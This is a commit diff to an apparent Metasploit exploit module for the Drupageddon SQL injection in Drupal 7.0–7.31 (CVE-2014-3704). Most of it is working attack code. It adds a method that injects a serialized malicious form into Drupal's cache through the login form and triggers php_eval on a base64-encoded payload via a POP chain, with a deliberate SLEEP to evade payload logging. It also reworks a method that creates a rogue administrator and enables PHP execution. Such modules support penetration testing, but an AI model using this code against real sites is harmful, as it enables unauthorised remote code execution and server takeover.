Land rapid7#9215, new Drupageddon vector

wvu · wvu · commit a1d43c8f33dd · 2018-01-03T14:45:32.000-06:00
diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb
@@ -16,40 +16,155 @@ def initialize(info={})
         (aka Drupageddon) in order to achieve a remote shell on the vulnerable
         instance. This module was tested against Drupal 7.0 and 7.31 (was fixed
         in 7.32).
+
+        Two methods are available to trigger the PHP payload on the target:
+
+        - set TARGET 0:
+          Form-cache PHP injection method (default).
+          This uses the SQLi to upload a malicious form to Drupal's cache,
+          then trigger the cache entry to execute the payload using a POP chain.
+
+        - set TARGET 1:
+          User-post injection method.
+          This creates a new Drupal user, adds it to the administrators group,
+          enable Drupal's PHP module, grant the administrators the right to
+          bundle PHP code in their post, create a new post containing the
+          payload and preview it to trigger the payload execution.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'SektionEins',          # discovery
-          'Christian Mehlmauer',  # msf module
-          'Brandon Perry'         # msf module
+          'WhiteWinterWolf',      # form-cache PHP injection method
+          'Christian Mehlmauer',  # user-post PHP injection method
+          'Brandon Perry'         # user-post PHP injection method
         ],
       'References'     =>
         [
           ['CVE', '2014-3704'],
           ['URL', 'https://www.drupal.org/SA-CORE-2014-005'],
-          ['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html']
+          ['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html'],
+          ['URL', 'https://www.whitewinterwolf.com/posts/2017/11/16/drupageddon-revisited-a-new-path-from-sql-injection-to-remote-command-execution-cve-2014-3704/']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [['Drupal 7.0 - 7.31',{}]],
+      'Targets'        =>
+        [
+          ['Drupal 7.0 - 7.31 (form-cache PHP injection method)', {}],
+          ['Drupal 7.0 - 7.31 (user-post PHP injection method)', {}]
+        ],
       'DisclosureDate' => 'Oct 15 2014',
       'DefaultTarget'  => 0
     ))
 
     register_options(
-    [
-      OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
-    ])
+      [
+        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
+      ])
 
     register_advanced_options(
-    [
-      OptString.new('ADMIN_ROLE', [ true, "The administrator role", 'administrator']),
-      OptInt.new('ITER', [ true, "Hash iterations (2^ITER)", 10])
-    ])
+      [
+        OptInt.new('Wait', [true, "Number of seconds to wait before triggering the payload sent (form-cache method only).", 5]),
+        OptString.new('ADMIN_ROLE', [ true, "The administrator role (user-post method only)", 'administrator']),
+        OptInt.new('Iter', [ true, "Hash iterations (2^ITER, user-post method only))", 10])
+      ])
+  end
+
+  ##
+  # Form-cache PHP injection method
+  ##
+
+  def sql_insert(id, value)
+    curlyopen = rand_text_alphanumeric(8)
+    curlyclose = rand_text_alphanumeric(8)
+    value.gsub!('{', curlyopen)
+    value.gsub!('}', curlyclose)
+
+    "INSERT INTO {cache_form} (cid, data, expire, created, serialized) " \
+      + "VALUES ('#{id}', REPLACE(REPLACE('#{value}', '#{curlyopen}', " \
+      + "CHAR(#{'{'.ord})), '#{curlyclose}', CHAR(#{'}'.ord})), -1, 0, 1);"
+  end
+
+  def exploit_formcache
+    form_build_id = 'form-' + rand_text_alphanumeric(43)
+
+    # Remove the malicious cache entries upon success.
+    evalstr = "cache_clear_all(array('form_" + form_build_id + "', " \
+      + "'form_state_" + form_build_id + "'), 'cache_form');"
+    evalstr << payload.encoded
+    evalstr = Rex::Text.encode_base64(evalstr)
+    # '<?php' tag required by php_eval().
+    evalstr = "<?php eval(base64_decode(\\'#{evalstr}\\'));"
+    # Don't count the backslashes.
+    evalstr_len = evalstr.length - 2
+
+    # Serialized malicious form state.
+    # The PHP module may be disabled (and should be).
+    # Load its definition manually to get access to php_eval().
+    state = 'a:1:{s:10:"build_info";a:1:{s:5:"files";a:1:{'
+      state << 'i:0;s:22:"modules/php/php.module";'
+    state << '}}}'
+    # Initiates a POP chain in includes/form.inc:1850, form_builder()
+    form = 'a:6:{'
+      form << 's:5:"#type";s:4:"form";'
+      form << 's:8:"#parents";a:1:{i:0;s:4:"user";}'
+      form << 's:8:"#process";a:1:{i:0;s:13:"drupal_render";}'
+      form << 's:16:"#defaults_loaded";b:1;'
+      form << 's:12:"#post_render";a:1:{i:0;s:8:"php_eval";}'
+      form << 's:9:"#children";s:' + evalstr_len.to_s + ':"' + evalstr + '";'
+    form << '}'
+
+    # SQL injection key lines:
+    # - modules/user/user.module:2149, user_login_authenticate_validate()
+    # - includes/database/database.inc:745, expandArguments()
+    sql = sql_insert('form_state_' + form_build_id, state)
+    sql << sql_insert('form_' + form_build_id, form)
+    # Causes PHP script to timeout, avoiding payload logging.
+    sql << 'SELECT SLEEP(666);'
+
+    # Use the login form to inject the malicious cache entry.
+    # '!' follows redirects, used by some Drupal sites to enforce clean URLs.
+    # Don't check the return code as it *will* timeout.
+    send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'vars_post' => {
+        # Don't use 'user_login_block' as it may be disabled.
+        'form_id' => 'user_login',
+        'form_build_id' => '',
+        "name[0;#{sql}#]" => '',
+        # This field must be located *after* the injection.
+        "name[0]" => '',
+        'op' => 'Log in',
+        'pass' => Rex::Text.rand_text_alpha(8)
+      },
+      'vars_get' => {
+        'q' => 'user/login'
+      }
+    }, timeout=datastore['Wait'])
+
+    # Trigger the malicious cache entry using its form ID.
+    send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'vars_post' => {
+        'form_id' => 'user_login',
+        "form_build_id" => form_build_id,
+        "name" => Rex::Text.rand_text_alpha(10),
+        'op' => 'Log in',
+        'pass' => Rex::Text.rand_text_alpha(10)
+      },
+      'vars_get' => {
+        'q' => 'user/login'
+      }
+    })
   end
 
+  ##
+  # User-post PHP injection method
+  ##
+
   def uri_path
     normalize_uri(target_uri.path)
   end
@@ -59,7 +174,7 @@ def admin_role
   end
 
   def iter
-    datastore['ITER']
+    datastore['Iter']
   end
 
   def itoa64
@@ -133,7 +248,7 @@ def extract_form_ids(content)
     return form_build_id, form_token
   end
 
-  def exploit
+  def exploit_newuser
 
     # TODO: Check if option admin_role exists via admin/people/permissions/roles
 
@@ -352,4 +467,19 @@ def exploit
       'cookie' => cookie
     )
   end
+
+  ##
+  # Main
+  ##
+
+  def exploit
+    case datastore['TARGET']
+      when 0
+        exploit_formcache
+      when 1
+        exploit_newuser
+      else
+        fail_with(Failure::BadConfig, "Invalid target selected.")
+    end
+  end
 end
